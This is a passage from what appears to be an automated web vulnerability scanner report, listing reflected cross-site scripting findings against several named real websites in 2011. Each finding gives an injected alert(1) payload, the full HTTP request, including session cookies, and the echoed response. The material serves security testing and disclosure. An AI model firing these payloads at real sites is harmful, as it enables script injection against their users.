<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
</label>';
           var input_numberOfFriend = false5ba8d;alert(1)//2437f3f8a0d;
           if(checkSubmit=="R"){
               document.getElementById("PC_7_1_CKB_no_of_rf_question").style.display="none";
               document.getElementById("PC_7_1_CKB_no_of_rf_question").innerHTML="";
           }else{
               docu
...[SNIP]...

4.179. http://www.mvtimes.com/marthas-vineyard/article.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mvtimes.com
Path:	/marthas-vineyard/article.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cc72'-alert(1)-'1c7617b9920 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /marthas-vineyard/article.php?id=7029&2cc72'-alert(1)-'1c7617b9920=1 HTTP/1.1
Host: www.mvtimes.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 00:47:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Length: 32122
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tuna fever can be a fatal disea
...[SNIP]...
<script type="text/javascript">
var disqus_shortname = 'mvtimes'
var disqus_identifier = '7029';
var disqus_url = 'http://www.mvtimes.com/marthas-vineyard/article.php?id=7029&2cc72'-alert(1)-'1c7617b9920=1';
var disqus_title = 'Tuna fever can be a fatal disease for those who venture too far';
(function() {
var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
dsq.
...[SNIP]...

4.180. http://www.mvtimes.com/marthas-vineyard/article.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mvtimes.com
Path:	/marthas-vineyard/article.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10b44"><script>alert(1)</script>c0858cb6b83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marthas-vineyard/article.php?id=7029&10b44"><script>alert(1)</script>c0858cb6b83=1 HTTP/1.1
Host: www.mvtimes.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 00:47:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Length: 32523
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tuna fever can be a fatal disea
...[SNIP]...
<a href="/marthas-vineyard/article.php?id=7029&10b44"><script>alert(1)</script>c0858cb6b83=1&mode=print">
...[SNIP]...

4.181. http://www.nations-baseball.com/index.cfm [event parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nations-baseball.com
Path:	/index.cfm

Issue detail

The value of the event request parameter is copied into the HTML document as plain text between tags. The payload cbbc9<script>alert(1)</script>9c8029bf821 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?event=general.homecbbc9<script>alert(1)</script>9c8029bf821 HTTP/1.1
Host: www.nations-baseball.com
Proxy-Connection: keep-alive
Referer: http://wiki.coldbox.org/wiki/UsingColdBox.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=21104014; CFTOKEN=59538972

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 31 Aug 2011 21:17:35 GMT
Content-Length: 45745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http:
...[SNIP]...
<b>Sorry the page (homecbbc9<script>alert(1)</script>9c8029bf821) you are trying to reach is temporarily unavailable or the page no longer exists.</b>
...[SNIP]...

4.182. http://www.northeastassembly.org/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.northeastassembly.org
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 96123<img%20src%3da%20onerror%3dalert(1)>4d326f7959d was submitted in the REST URL parameter 1. This input was echoed as 96123<img src=a onerror=alert(1)>4d326f7959d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.ico96123<img%20src%3da%20onerror%3dalert(1)>4d326f7959d HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: www.northeastassembly.org
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:24:12 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
X-Powered-By: BlueDragon Server/7.1.0.29, Servlet/2.5, JSP/2.1
Content-Type: text/html; charset=utf-8
Content-Length: 11349

<style>
/* DEBUG PANEL MAIN */
.fw_debugPanel{
font-family: Arial,Helvetica,sans-serif;
font-size: 11px;
font-weight: normal;
color: #000000;
text-align: left;
...[SNIP]...
</strong>
The event handler: favicon.ico96123<img src=a onerror=alert(1)>4d326f7959d.home is not valid registered event.<br />
...[SNIP]...

4.183. http://www.northeastassembly.org/includes/userfiles/flash/splash.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.northeastassembly.org
Path:	/includes/userfiles/flash/splash.swf

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d545c<img%20src%3da%20onerror%3dalert(1)>a17ba1d1400 was submitted in the REST URL parameter 1. This input was echoed as d545c<img src=a onerror=alert(1)>a17ba1d1400 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /includesd545c<img%20src%3da%20onerror%3dalert(1)>a17ba1d1400/userfiles/flash/splash.swf HTTP/1.1
Host: www.northeastassembly.org
Proxy-Connection: keep-alive
Referer: http://www.northeastassembly.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=23825; CFTOKEN=518A16FC-CF0D-4208-A8437E05802441A9

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:24:33 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
X-Powered-By: BlueDragon Server/7.1.0.29, Servlet/2.5, JSP/2.1
Content-Type: text/html; charset=utf-8
Content-Length: 11531

<style>
/* DEBUG PANEL MAIN */
.fw_debugPanel{
font-family: Arial,Helvetica,sans-serif;
font-size: 11px;
font-weight: normal;
color: #000000;
text-align: left;
...[SNIP]...
</strong>
The event handler: includesd545c<img src=a onerror=alert(1)>a17ba1d1400.userfiles is not valid registered event.<br />
...[SNIP]...

4.184. http://www.northeastassembly.org/includes/userfiles/flash/splash.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.northeastassembly.org
Path:	/includes/userfiles/flash/splash.swf

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48c90<img%20src%3da%20onerror%3dalert(1)>8fb9e79cd91 was submitted in the REST URL parameter 2. This input was echoed as 48c90<img src=a onerror=alert(1)>8fb9e79cd91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /includes/userfiles48c90<img%20src%3da%20onerror%3dalert(1)>8fb9e79cd91/flash/splash.swf HTTP/1.1
Host: www.northeastassembly.org
Proxy-Connection: keep-alive
Referer: http://www.northeastassembly.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=23825; CFTOKEN=518A16FC-CF0D-4208-A8437E05802441A9

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:24:37 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
X-Powered-By: BlueDragon Server/7.1.0.29, Servlet/2.5, JSP/2.1
Content-Type: text/html; charset=utf-8
Content-Length: 11531

<style>
/* DEBUG PANEL MAIN */
.fw_debugPanel{
font-family: Arial,Helvetica,sans-serif;
font-size: 11px;
font-weight: normal;
color: #000000;
text-align: left;
...[SNIP]...
</strong>
The event handler: includes.userfiles48c90<img src=a onerror=alert(1)>8fb9e79cd91 is not valid registered event.<br />
...[SNIP]...

4.185. http://www.northeastassembly.org/includes/userfiles/flash/splash.swf [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.northeastassembly.org
Path:	/includes/userfiles/flash/splash.swf

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8aa59<script>alert(1)</script>591ff6210ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/userfiles/flash8aa59<script>alert(1)</script>591ff6210ff/splash.swf HTTP/1.1
Host: www.northeastassembly.org
Proxy-Connection: keep-alive
Referer: http://www.northeastassembly.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=23825; CFTOKEN=518A16FC-CF0D-4208-A8437E05802441A9

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:24:41 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
X-Powered-By: BlueDragon Server/7.1.0.29, Servlet/2.5, JSP/2.1
Content-Type: text/html; charset=utf-8
Content-Length: 11440

<style>
/* DEBUG PANEL MAIN */
.fw_debugPanel{
font-family: Arial,Helvetica,sans-serif;
font-size: 11px;
font-weight: normal;
color: #000000;
text-align: left;
...[SNIP]...
<td >/includes/userfiles/flash8aa59<script>alert(1)</script>591ff6210ff/splash.swf</td>
...[SNIP]...

4.186. http://www.northeastassembly.org/includes/userfiles/flash/splash.swf [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.northeastassembly.org
Path:	/includes/userfiles/flash/splash.swf

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 42bea<script>alert(1)</script>49517bc6b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/userfiles/flash/splash.swf42bea<script>alert(1)</script>49517bc6b HTTP/1.1
Host: www.northeastassembly.org
Proxy-Connection: keep-alive
Referer: http://www.northeastassembly.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=23825; CFTOKEN=518A16FC-CF0D-4208-A8437E05802441A9

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:24:46 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
X-Powered-By: BlueDragon Server/7.1.0.29, Servlet/2.5, JSP/2.1
Content-Type: text/html; charset=utf-8
Content-Length: 11438

<style>
/* DEBUG PANEL MAIN */
.fw_debugPanel{
font-family: Arial,Helvetica,sans-serif;
font-size: 11px;
font-weight: normal;
color: #000000;
text-align: left;
...[SNIP]...
<td >/includes/userfiles/flash/splash.swf42bea<script>alert(1)</script>49517bc6b</td>
...[SNIP]...

4.187. http://www.nydailynews.com/img/static/covers/backpage_cover.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/img/static/covers/backpage_cover.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7173f'%3balert(1)//3a5e4e79bff was submitted in the REST URL parameter 1. This input was echoed as 7173f';alert(1)//3a5e4e79bff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /img7173f'%3balert(1)//3a5e4e79bff/static/covers/backpage_cover.jpg?1313102107 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; __utma=263866259.953009987.1312767390.1312767390.1312835786.2; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000563892833=MtYkkj3J|WW003trLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8soM1H0s|8M8soM1H0s|8M8soM1H0s|s|8M8soM1H0s|8M8soM1H0s; Zvents=ujkx1w2rt6

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:39:11 GMT
Server: Apache
Keep-Alive: timeout=3, max=998
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69751

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
{
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/img7173f';alert(1)//3a5e4e79bff/static/covers/backpage_cover.jpg';
}
//-->
...[SNIP]...

4.188. http://www.nydailynews.com/img/static/covers/backpage_cover.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/img/static/covers/backpage_cover.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b563'%3balert(1)//6baa6ca43a7 was submitted in the REST URL parameter 2. This input was echoed as 8b563';alert(1)//6baa6ca43a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /img/static8b563'%3balert(1)//6baa6ca43a7/covers/backpage_cover.jpg?1313102107 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; __utma=263866259.953009987.1312767390.1312767390.1312835786.2; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000563892833=MtYkkj3J|WW003trLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8soM1H0s|8M8soM1H0s|8M8soM1H0s|s|8M8soM1H0s|8M8soM1H0s; Zvents=ujkx1w2rt6

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:39:23 GMT
Server: Apache
Keep-Alive: timeout=3, max=1000
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69751

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/img/static8b563';alert(1)//6baa6ca43a7/covers/backpage_cover.jpg';
}
//-->
...[SNIP]...

4.189. http://www.nydailynews.com/img/static/covers/backpage_cover.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/img/static/covers/backpage_cover.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45ad9'%3balert(1)//dca9cdb09d8 was submitted in the REST URL parameter 3. This input was echoed as 45ad9';alert(1)//dca9cdb09d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /img/static/covers45ad9'%3balert(1)//dca9cdb09d8/backpage_cover.jpg?1313102107 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; __utma=263866259.953009987.1312767390.1312767390.1312835786.2; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000563892833=MtYkkj3J|WW003trLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8soM1H0s|8M8soM1H0s|8M8soM1H0s|s|8M8soM1H0s|8M8soM1H0s; Zvents=ujkx1w2rt6

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:39:36 GMT
Server: Apache
Keep-Alive: timeout=3, max=997
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69751

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/img/static/covers45ad9';alert(1)//dca9cdb09d8/backpage_cover.jpg';
}
//-->
...[SNIP]...

4.190. http://www.nydailynews.com/img/static/covers/backpage_cover.jpg [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/img/static/covers/backpage_cover.jpg

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e52f7'%3balert(1)//c6fe33d9af8 was submitted in the REST URL parameter 4. This input was echoed as e52f7';alert(1)//c6fe33d9af8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /img/static/covers/backpage_cover.jpge52f7'%3balert(1)//c6fe33d9af8?1313102107 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; __utma=263866259.953009987.1312767390.1312767390.1312835786.2; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000563892833=MtYkkj3J|WW003trLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8soM1H0s|8M8soM1H0s|8M8soM1H0s|s|8M8soM1H0s|8M8soM1H0s; Zvents=ujkx1w2rt6

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:39:49 GMT
Server: Apache
Keep-Alive: timeout=3, max=995
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69751

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/img/static/covers/backpage_cover.jpge52f7';alert(1)//c6fe33d9af8';
}
//-->
...[SNIP]...

4.191. http://www.nydailynews.com/img/static/covers/frontpage_cover.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/img/static/covers/frontpage_cover.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5700b'%3balert(1)//a4618d0f33e was submitted in the REST URL parameter 1. This input was echoed as 5700b';alert(1)//a4618d0f33e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /img5700b'%3balert(1)//a4618d0f33e/static/covers/frontpage_cover.jpg?1313102107 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; __utma=263866259.953009987.1312767390.1312767390.1312835786.2; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000563892833=MtYkkj3J|WW003trLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8soM1H0s|8M8soM1H0s|8M8soM1H0s|s|8M8soM1H0s|8M8soM1H0s; Zvents=ujkx1w2rt6

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:39:09 GMT
Server: Apache
Keep-Alive: timeout=3, max=993
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69752

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
{
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/img5700b';alert(1)//a4618d0f33e/static/covers/frontpage_cover.jpg';
}
//-->
...[SNIP]...

4.192. http://www.nydailynews.com/img/static/covers/frontpage_cover.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/img/static/covers/frontpage_cover.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6e7b'%3balert(1)//3e61a40bc15 was submitted in the REST URL parameter 2. This input was echoed as c6e7b';alert(1)//3e61a40bc15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /img/staticc6e7b'%3balert(1)//3e61a40bc15/covers/frontpage_cover.jpg?1313102107 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
